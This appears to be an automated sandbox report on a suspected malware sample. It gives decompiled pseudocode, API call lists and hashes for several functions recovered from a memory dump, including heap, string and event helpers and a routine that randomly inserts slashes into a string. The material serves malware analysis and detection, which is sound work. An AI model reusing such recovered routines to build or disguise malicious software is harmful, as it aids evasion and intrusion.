                                                                                                                                  • Opcode ID: 2d8e84adb9e27f7af4c1640abc85dfa2ffc07687411831b75a2a9cd2a1ee4114
                                                                                                                                  • Instruction ID: 1165756e2127f99b004d2501cad0350e5e8a6c1b7b5c1c5953057f211ddf2a44
                                                                                                                                  • Opcode Fuzzy Hash: 2d8e84adb9e27f7af4c1640abc85dfa2ffc07687411831b75a2a9cd2a1ee4114
                                                                                                                                  • Instruction Fuzzy Hash: 3A21717590120AEFCB12DFE4D8889EEBBB9FF49344B104569E945EB204EB70DA10CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E022BA41C(unsigned int __eax, void* __ecx) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				signed int _t21;
                                                                                                                                  				signed short _t23;
                                                                                                                                  				char* _t27;
                                                                                                                                  				void* _t29;
                                                                                                                                  				void* _t30;
                                                                                                                                  				unsigned int _t33;
                                                                                                                                  				void* _t37;
                                                                                                                                  				unsigned int _t38;
                                                                                                                                  				void* _t41;
                                                                                                                                  				void* _t42;
                                                                                                                                  				int _t45;
                                                                                                                                  				void* _t46;
                                                                                                                                  
                                                                                                                                  				_t42 = __eax;
                                                                                                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                  				_t38 = __eax;
                                                                                                                                  				_t30 = RtlAllocateHeap( *0x22bd238, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                  				_v12 = _t30;
                                                                                                                                  				if(_t30 != 0) {
                                                                                                                                  					_v8 = _t42;
                                                                                                                                  					do {
                                                                                                                                  						_t33 = 0x18;
                                                                                                                                  						if(_t38 <= _t33) {
                                                                                                                                  							_t33 = _t38;
                                                                                                                                  						}
                                                                                                                                  						_t21 =  *0x22bd250; // 0x9d9fc5bc
                                                                                                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                  						 *0x22bd250 = _t23;
                                                                                                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                  						memcpy(_t30, _v8, _t45);
                                                                                                                                  						_v8 = _v8 + _t45;
                                                                                                                                  						_t27 = _t30 + _t45;
                                                                                                                                  						_t38 = _t38 - _t45;
                                                                                                                                  						_t46 = _t46 + 0xc;
                                                                                                                                  						 *_t27 = 0x2f;
                                                                                                                                  						_t13 = _t27 + 1; // 0x1
                                                                                                                                  						_t30 = _t13;
                                                                                                                                  					} while (_t38 > 8);
                                                                                                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                  				}
                                                                                                                                  				return _v12;
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,022B7C20,00000000,?,?,022B9DA0,?,047795B0), ref: 022BA427
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 022BA43F
                                                                                                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,022B7C20,00000000,?,?,022B9DA0,?,047795B0), ref: 022BA483
                                                                                                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 022BA4A4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1819133394-0
                                                                                                                                  • Opcode ID: 4235501702fdb20eb6926caa8423ccedeec94c45628d2b026201e5eca39d1b01
                                                                                                                                  • Instruction ID: 817894fcbb44d1c1799e8e82e0ef715ea410159f081aaa69b3cf52842de74b2f
                                                                                                                                  • Opcode Fuzzy Hash: 4235501702fdb20eb6926caa8423ccedeec94c45628d2b026201e5eca39d1b01
                                                                                                                                  • Instruction Fuzzy Hash: 7E110672E40215AFC3158AE9DC88DDABBBEDFC43A1B050276F80497141EB709E148760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B8C01(void* __esi) {
                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v4;
                                                                                                                                  				void* _t8;
                                                                                                                                  				void* _t10;
                                                                                                                                  
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				memset(__esi, 0, 0x38);
                                                                                                                                  				_t8 = CreateEventA(0, 1, 0, 0);
                                                                                                                                  				 *(__esi + 0x1c) = _t8;
                                                                                                                                  				if(_t8 != 0) {
                                                                                                                                  					_t10 = CreateEventA(0, 1, 1, 0);
                                                                                                                                  					 *(__esi + 0x20) = _t10;
                                                                                                                                  					if(_t10 == 0) {
                                                                                                                                  						CloseHandle( *(__esi + 0x1c));
                                                                                                                                  					} else {
                                                                                                                                  						_v4 = 1;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v4;
                                                                                                                                  			}







                                                                                                                                  APIs
                                                                                                                                  • memset.NTDLL ref: 022B8C0F
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 022B8C24
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 022B8C31
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 022B8C43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEvent$CloseHandlememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2812548120-0
                                                                                                                                  • Opcode ID: b6632ea0708cf8b7d28637f41a25936e31d25e26250633cc9473a2e01060dd9c
                                                                                                                                  • Instruction ID: 81c7107b10114a8700b31b38d07b9648d39c11907f3bff9a9d32d44b67a74a4e
                                                                                                                                  • Opcode Fuzzy Hash: b6632ea0708cf8b7d28637f41a25936e31d25e26250633cc9473a2e01060dd9c
                                                                                                                                  • Instruction Fuzzy Hash: F9F0BEF1506308BFD3156FA2DCC4C2BBBACEF4129AB194D2EF04682111C672A8488AB0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B4DB1() {
                                                                                                                                  				void* _t1;
                                                                                                                                  				intOrPtr _t5;
                                                                                                                                  				void* _t6;
                                                                                                                                  				void* _t7;
                                                                                                                                  				void* _t11;
                                                                                                                                  
                                                                                                                                  				_t1 =  *0x22bd26c; // 0x1ac
                                                                                                                                  				if(_t1 == 0) {
                                                                                                                                  					L8:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				SetEvent(_t1);
                                                                                                                                  				_t11 = 0x7fffffff;
                                                                                                                                  				while(1) {
                                                                                                                                  					SleepEx(0x64, 1);
                                                                                                                                  					_t5 =  *0x22bd2bc; // 0x0
                                                                                                                                  					if(_t5 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t11 = _t11 - 0x64;
                                                                                                                                  					if(_t11 > 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				_t6 =  *0x22bd26c; // 0x1ac
                                                                                                                                  				if(_t6 != 0) {
                                                                                                                                  					CloseHandle(_t6);
                                                                                                                                  				}
                                                                                                                                  				_t7 =  *0x22bd238; // 0x4380000
                                                                                                                                  				if(_t7 != 0) {
                                                                                                                                  					HeapDestroy(_t7);
                                                                                                                                  				}
                                                                                                                                  				goto L8;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(000001AC,00000001,022B7F41), ref: 022B4DBC
                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 022B4DCB
                                                                                                                                  • CloseHandle.KERNEL32(000001AC), ref: 022B4DEC
                                                                                                                                  • HeapDestroy.KERNEL32(04380000), ref: 022B4DFC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4109453060-0
                                                                                                                                  • Opcode ID: fc00813c0ec4d1226f6addf1a28443748d4b87cc3f6700b44d0a96643a69cf5c
                                                                                                                                  • Instruction ID: 21ef3d407eb7b35724f766421f5b416c53090b138f40fa814191e546f8b0eb8f
                                                                                                                                  • Opcode Fuzzy Hash: fc00813c0ec4d1226f6addf1a28443748d4b87cc3f6700b44d0a96643a69cf5c
                                                                                                                                  • Instruction Fuzzy Hash: 75F08239E953138BDA236AF5B89CB833A98AF047A0B044E10B900D7386CB60DC50C560
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E022B8CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				void* _t17;
                                                                                                                                  				intOrPtr* _t22;
                                                                                                                                  				void* _t27;
                                                                                                                                  				char* _t30;
                                                                                                                                  				void* _t33;
                                                                                                                                  				void* _t34;
                                                                                                                                  				void* _t36;
                                                                                                                                  				void* _t37;
                                                                                                                                  				void* _t39;
                                                                                                                                  				int _t42;
                                                                                                                                  
                                                                                                                                  				_t17 = __eax;
                                                                                                                                  				_t37 = 0;
                                                                                                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                  				_t2 = _t17 + 1; // 0x1
                                                                                                                                  				_t28 = _t2;
                                                                                                                                  				_t34 = E022B1525(_t2);
                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                  					_t30 = E022B1525(_t28);
                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                  						E022B8B22(_t34);
                                                                                                                                  					} else {
                                                                                                                                  						_t39 = _a4;
                                                                                                                                  						_t22 = E022BA7C2(_t39);
                                                                                                                                  						_v8 = _t22;
                                                                                                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                  							_a4 = _t39;
                                                                                                                                  						} else {
                                                                                                                                  							_t26 = _t22 + 2;
                                                                                                                                  							_a4 = _t22 + 2;
                                                                                                                                  							_t22 = E022BA7C2(_t26);
                                                                                                                                  							_v8 = _t22;
                                                                                                                                  						}
                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                  							__imp__(_t34, _a4);
                                                                                                                                  							 *_t30 = 0x2f;
                                                                                                                                  							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t42 = _t22 - _a4;
                                                                                                                                  							memcpy(_t34, _a4, _t42);
                                                                                                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                  							__imp__(_t30, _v8);
                                                                                                                                  						}
                                                                                                                                  						 *_a8 = _t34;
                                                                                                                                  						_t37 = 1;
                                                                                                                                  						 *_a12 = _t30;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t37;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,022B9816,?,?,?,?,00000102,022B937B,?,?,00000000), ref: 022B8D06
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                    • Part of subcall function 022BA7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,022B8D34,00000000,00000001,00000001,?,?,022B9816,?,?,?,?,00000102), ref: 022BA7D0
                                                                                                                                    • Part of subcall function 022BA7C2: StrChrA.SHLWAPI(?,0000003F,?,?,022B9816,?,?,?,?,00000102,022B937B,?,?,00000000,00000000), ref: 022BA7DA
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022B9816,?,?,?,?,00000102,022B937B,?), ref: 022B8D64
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 022B8D74
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 022B8D80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3767559652-0
                                                                                                                                  • Opcode ID: 60faa0634f530c05c2ff258f31aa48387a3a7917365a391b75a9d546a4ae9b2d
                                                                                                                                  • Instruction ID: ff38b0755cadf074efcdd91ac50279f7ab19b3b2b1a3a4764ec7412eb553016c
                                                                                                                                  • Opcode Fuzzy Hash: 60faa0634f530c05c2ff258f31aa48387a3a7917365a391b75a9d546a4ae9b2d
                                                                                                                                  • Instruction Fuzzy Hash: C0219072524257AFCB035FF9D844AEA7FBDAF163C4F048456F9099B215DB70C9108BA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _t18;
                                                                                                                                  				int _t25;
                                                                                                                                  				int _t29;
                                                                                                                                  				int _t34;
                                                                                                                                  
                                                                                                                                  				_t29 = lstrlenW(_a4);
                                                                                                                                  				_t25 = lstrlenW(_a8);
                                                                                                                                  				_t18 = E022B1525(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                  				_v8 = _t18;
                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                  					_t34 = _t29 + _t29;
                                                                                                                                  					memcpy(_t18, _a4, _t34);
                                                                                                                                  					_t10 = _t25 + 2; // 0x2
                                                                                                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,0477935C,?,022B5398,004F0053,0477935C,?,?,?,?,?,?,022B7CCB), ref: 022B273D
                                                                                                                                  • lstrlenW.KERNEL32(022B5398,?,022B5398,004F0053,0477935C,?,?,?,?,?,?,022B7CCB), ref: 022B2744
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,022B5398,004F0053,0477935C,?,?,?,?,?,?,022B7CCB), ref: 022B2764
                                                                                                                                  • memcpy.NTDLL(74E069A0,022B5398,00000002,00000000,004F0053,74E069A0,?,?,022B5398,004F0053,0477935C), ref: 022B2777
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2411391700-0
                                                                                                                                  • Opcode ID: 7275af3dc85ff03b843a92ef3f22ea42f0f6f7155d4f06841fecfb6db918073f
                                                                                                                                  • Instruction ID: 30200d2a8fb0c166293e89aea37821c4bbf9a330be52ae2dca02caba4ae32bc8
                                                                                                                                  • Opcode Fuzzy Hash: 7275af3dc85ff03b843a92ef3f22ea42f0f6f7155d4f06841fecfb6db918073f
                                                                                                                                  • Instruction Fuzzy Hash: 93F03C32910119BB8B129FE9CC44CDE7BADEF093947054462AD0497105EA31EA149BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(04779BF8,00000000,00000000,7691C740,022B9DCB,00000000), ref: 022BA687
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 022BA68F
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • lstrcpy.KERNEL32(00000000,04779BF8), ref: 022BA6A3
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 022BA6AE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 74227042-0
                                                                                                                                  • Opcode ID: f9e23268d9e12000d37aa2fdc0f96aecc0c83400bbaa0744dc5bda3c80baf7c5
                                                                                                                                  • Instruction ID: 749619c357926ffd095fef379ecd817b26e4255d72d0f9e31fc70ceda824fbab
                                                                                                                                  • Opcode Fuzzy Hash: f9e23268d9e12000d37aa2fdc0f96aecc0c83400bbaa0744dc5bda3c80baf7c5
                                                                                                                                  • Instruction Fuzzy Hash: E2E01273D056216B87139BE4BC4CC9BBBADEF9A7557040C17F600D3114C765D8258BE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%